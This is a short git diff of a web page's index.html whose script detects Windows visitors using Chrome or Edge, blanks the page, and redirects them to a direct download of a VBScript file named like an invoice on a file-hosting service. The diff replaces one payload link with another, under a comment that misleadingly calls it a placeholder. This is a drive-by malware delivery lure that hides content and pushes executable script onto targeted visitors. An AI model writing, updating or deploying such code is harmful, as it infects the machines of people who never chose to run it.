--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store6.gofile.io/download/direct/6ea468ce-b84e-4475-862b-29acdba00765/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://cold1.gofile.io/download/direct/4f019dd0-3ac8-4664-b878-7cf57d0fc0d1/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
